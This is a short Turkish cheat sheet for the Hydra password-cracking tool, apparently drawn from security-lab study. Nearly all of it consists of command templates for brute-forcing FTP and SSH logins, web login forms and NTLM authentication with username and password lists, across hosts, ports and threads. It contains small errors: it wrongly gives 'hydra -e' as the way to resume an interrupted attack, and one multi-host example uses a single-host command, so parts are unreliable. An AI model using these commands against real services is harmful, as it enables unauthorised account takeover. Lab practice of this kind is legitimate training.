HYDRA

Hydra, brute-force yöntemiyle çalışan bir online parola kırma programıdır. Hydra'yı kullanarak bir parola listesini tarayabilir ve bazı kimlik doğrulama hizmetlerini "brute force" yöntemiyle kırabiliriz. Örneğin, belirli bir hizmette (SSH, Web Uygulama Formu, FTP veya SNMP) birinin parolasını manuel olarak tahmin etmeye çalıştığınızı düşünün; Hydra'yı kullanarak bir parola listesini tarayabilir ve bu işlemi bizim için yaparak doğru parolayı belirleyebiliriz.

HYDRA Commands

Syntax :
• hydra -l username -p password IP SERVICE

Examples

• Kullanıcı adı ve parola vererek ftp protoclüne saldırma

hydra -l minter -p coder123 IP ftp 

• Kullanıcı adı ve parola dosyada vererek ftp protoclüne saldırma

hydra -L usernames.txt -P passwords.txt IP ftp -v (verbose)

• Kullanıcı adlarını dosyada ve bir tane parola vererek ftp protoclüne saldırma

hydra -L usernames.txt -p coder123 IP ftp

• Tek bir kullanıcı adını ve parolaları dosyada vererek ftp protoclüne saldırma

hydra -l minter -P passwords.txt IP ftp -o msf.txt

• Kullanıcı adlarını ve parolaları dosyada vererek birden fazla hosta (hostlar.txt) 35.portta bulunan ftp portuna saldırma

hydra -L usernames.txt -P pass.txt -M hostlar.txt ftp -s 35  

• Kullanıcı adlarını ve parolaları dosyada vererek birden fazla hosta (hostlar.txt) 21.portta bulunan ftp portuna saldırma

hydra -L usernames.txt -P pass.txt IP ftp -s 21  

• Kullanıcı adını ve parolayı vererek 4 thread ile ssh protocolüne saldırma

hydra -l me -p mepass IP -t 4 ssh  

Örneğin devam edilen atağın ortasına CTRL+C yaptık o atağın devam etmesi için:

hydra -e 

POST REQUEST

hydra -L userlist -P passlist <ip> http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect” -v

-> incorrect sitede response'da görünen kısım olarak bilinir.

Misc

hydra -I -V -L ./usernames.txt -p 'Changeme123' ntlmauth.za.tryhackme.com http-get '/:A=NTLM:F=401'